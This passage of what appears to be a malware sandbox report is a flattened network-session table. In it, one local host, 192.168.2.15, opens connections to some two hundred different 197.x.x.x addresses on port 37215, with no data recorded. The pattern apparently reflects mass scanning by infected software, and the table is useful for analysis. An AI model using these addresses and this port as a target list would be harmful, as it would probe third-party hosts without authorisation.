                                                                            14334192.168.2.1540500197.64.167.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14335192.168.2.1552846197.104.66.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14336192.168.2.1560858197.203.67.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14337192.168.2.1534404197.205.198.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14338192.168.2.1543962197.106.74.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14339192.168.2.1556332197.119.92.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14340192.168.2.1558650197.71.23.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14341192.168.2.1544714197.251.162.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14342192.168.2.1560908197.19.116.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14343192.168.2.1540128197.187.109.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14344192.168.2.1540744197.118.45.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14345192.168.2.1552030197.41.167.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14346192.168.2.1558696197.140.211.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14347192.168.2.1548790197.144.240.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14348192.168.2.1549732197.27.174.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14349192.168.2.1557506197.141.215.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14350192.168.2.1537048197.21.225.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14351192.168.2.1550498197.63.107.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14352192.168.2.1544914197.117.204.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14353192.168.2.1548878197.162.98.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14354192.168.2.1545474197.21.148.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14355192.168.2.1551972197.216.114.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14356192.168.2.1546952197.12.6.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14357192.168.2.1553332197.159.58.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14358192.168.2.1559980197.37.254.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14359192.168.2.1557228197.25.111.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14360192.168.2.1540016197.57.127.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14361192.168.2.1539874197.212.251.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14362192.168.2.1560848197.18.171.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14363192.168.2.1537592197.106.4.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14364192.168.2.1540394197.99.17.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14365192.168.2.1535068197.126.17.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14366192.168.2.1537988197.175.54.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14367192.168.2.1556792197.176.49.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14368192.168.2.1545266197.190.81.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14369192.168.2.1540602197.114.169.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14370192.168.2.1554182197.249.157.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14371192.168.2.1534766197.92.18.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14372192.168.2.1543222197.19.131.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14373192.168.2.1534028197.129.32.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14374192.168.2.1534470197.60.177.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14375192.168.2.1551294197.19.211.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14376192.168.2.1549274197.74.72.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14377192.168.2.1554640197.141.163.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14378192.168.2.1555962197.74.74.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14379192.168.2.1557682197.98.133.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14380192.168.2.1547678197.16.112.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14381192.168.2.1538300197.211.30.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14382192.168.2.1555358197.70.2.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14383192.168.2.1551636197.175.39.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14384192.168.2.1553922197.203.87.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14385192.168.2.1556994197.35.76.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14386192.168.2.1532924197.217.106.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14387192.168.2.1542990197.224.86.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14388192.168.2.1556956197.162.208.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14389192.168.2.1552306197.240.198.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14390192.168.2.1544446197.143.231.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14391192.168.2.1549884197.69.141.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14392192.168.2.1535478197.238.97.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14393192.168.2.1552600197.155.224.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14394192.168.2.1550938197.251.191.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14395192.168.2.1543830197.237.97.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14396192.168.2.1551856197.186.116.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14397192.168.2.1532820197.117.34.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14398192.168.2.1544960197.131.98.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14399192.168.2.1538202197.68.252.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14400192.168.2.1537630197.149.87.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14401192.168.2.1543694197.128.167.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14402192.168.2.1544224197.154.28.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14403192.168.2.1557612197.105.61.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14404192.168.2.1560952197.239.116.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14405192.168.2.1552496197.97.154.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14406192.168.2.1545780197.129.208.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14407192.168.2.1534224197.69.138.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14408192.168.2.1539522197.2.76.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14409192.168.2.1544494197.151.146.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14410192.168.2.1541982197.88.115.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14411192.168.2.1556878197.113.30.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14412192.168.2.1557290197.212.81.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14413192.168.2.1541652197.19.154.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14414192.168.2.1555410197.101.118.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14415192.168.2.1551592197.183.111.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14416192.168.2.1539406197.27.9.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14417192.168.2.1541364197.172.36.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14418192.168.2.1555880197.74.40.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14419192.168.2.1560524197.77.137.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14420192.168.2.1544170197.161.239.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14421192.168.2.1533684197.131.31.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14422192.168.2.1552848197.182.72.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14423192.168.2.1552454197.56.201.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14424192.168.2.1538068197.28.248.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14425192.168.2.1556472197.116.253.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14426192.168.2.1533122197.139.111.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14427192.168.2.1532768197.170.90.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14428192.168.2.1558580197.37.144.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14429192.168.2.1545326197.70.242.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14430192.168.2.1559284197.242.80.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14431192.168.2.1548464197.55.214.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14432192.168.2.1552992197.160.194.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14433192.168.2.1535994197.42.33.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14434192.168.2.1553270197.151.132.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14435192.168.2.1556704197.109.21.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14436192.168.2.1539606197.221.122.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14437192.168.2.1553600197.215.210.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14438192.168.2.1545914197.216.75.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14439192.168.2.1544482197.12.230.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14440192.168.2.1546506197.168.207.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14441192.168.2.1560174197.28.117.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14442192.168.2.1553568197.223.181.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14443192.168.2.1558280197.91.2.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14444192.168.2.1554428197.223.74.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14445192.168.2.1542654197.29.33.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14446192.168.2.1548532197.67.184.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14447192.168.2.1533856197.140.162.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14448192.168.2.1551984197.75.70.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14449192.168.2.1546320197.183.99.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14450192.168.2.1558192197.156.205.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14451192.168.2.1550736197.3.238.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14452192.168.2.1560890197.45.103.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14453192.168.2.1537410197.234.209.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14454192.168.2.1549712197.204.218.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14455192.168.2.1539958197.145.203.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14456192.168.2.1532790197.79.179.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14457192.168.2.1547674197.88.19.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14458192.168.2.1550510197.107.5.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14459192.168.2.1545140197.200.148.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14460192.168.2.1536656197.35.18.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14461192.168.2.1555156197.75.249.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14462192.168.2.1556584197.88.244.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14463192.168.2.1534670197.12.5.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14464192.168.2.1545848197.104.206.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14465192.168.2.1532994197.101.216.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14466192.168.2.1541080197.241.178.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14467192.168.2.1533350197.166.159.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14468192.168.2.1546686197.10.74.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14469192.168.2.1553044197.123.15.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14470192.168.2.1554496197.144.176.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14471192.168.2.1547970197.188.215.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14472192.168.2.1542212197.198.152.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14473192.168.2.1551932197.113.162.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14474192.168.2.1546872197.151.84.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14475192.168.2.1538806197.137.72.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14476192.168.2.1547002197.234.5.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14477192.168.2.1549048197.128.70.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14478192.168.2.1553492197.185.59.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14479192.168.2.1546314197.70.52.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14480192.168.2.1546406197.130.99.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14481192.168.2.1555002197.200.158.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14482192.168.2.1543976197.235.48.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14483192.168.2.1558420197.118.86.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14484192.168.2.1553974197.226.105.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14485192.168.2.1538160197.160.241.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14486192.168.2.1540760197.24.57.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14487192.168.2.1544870197.7.236.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14488192.168.2.1550522197.7.162.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14489192.168.2.1545994197.191.63.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14490192.168.2.1551718197.129.52.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14491192.168.2.1560674197.202.98.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14492192.168.2.1550364197.224.41.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14493192.168.2.1546168197.189.7.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14494192.168.2.1553802197.214.200.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14495192.168.2.1548246197.135.221.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14496192.168.2.1547040197.205.137.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14497192.168.2.1535796197.171.4.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14498192.168.2.1535374197.48.40.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14499192.168.2.1539758197.94.237.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14500192.168.2.1548638197.175.231.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14501192.168.2.1537930197.149.11.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14502192.168.2.1559902197.155.253.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14503192.168.2.1550612197.249.69.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14504192.168.2.1532796197.185.198.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14505192.168.2.1559368197.137.68.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14506192.168.2.1546638197.112.214.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14507192.168.2.1536712197.107.117.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14508192.168.2.1557148197.131.119.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14509192.168.2.1533818197.195.211.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14510192.168.2.1547472197.18.155.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14511192.168.2.1548226197.16.35.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14512192.168.2.1536906197.108.113.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14513192.168.2.1557362197.133.238.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14514192.168.2.1547176197.103.153.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14515192.168.2.1539618197.79.125.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14516192.168.2.1558470197.187.57.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14517192.168.2.1551466197.69.189.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14518192.168.2.1543724197.126.41.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14519192.168.2.1558850197.251.19.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14520192.168.2.1535790197.26.151.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14521192.168.2.1550050197.236.159.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14522192.168.2.1533000197.236.137.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14523192.168.2.1559086197.158.92.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14524192.168.2.1541432197.102.251.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14525192.168.2.1535978197.59.159.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14526192.168.2.1544830197.172.236.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14527192.168.2.1537130197.61.41.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14528192.168.2.1541280197.131.5.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14529192.168.2.1544962197.34.106.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14530192.168.2.1551112197.206.121.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14531192.168.2.1560398197.235.188.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14532192.168.2.1549200197.174.243.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14533192.168.2.1542258197.18.29.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
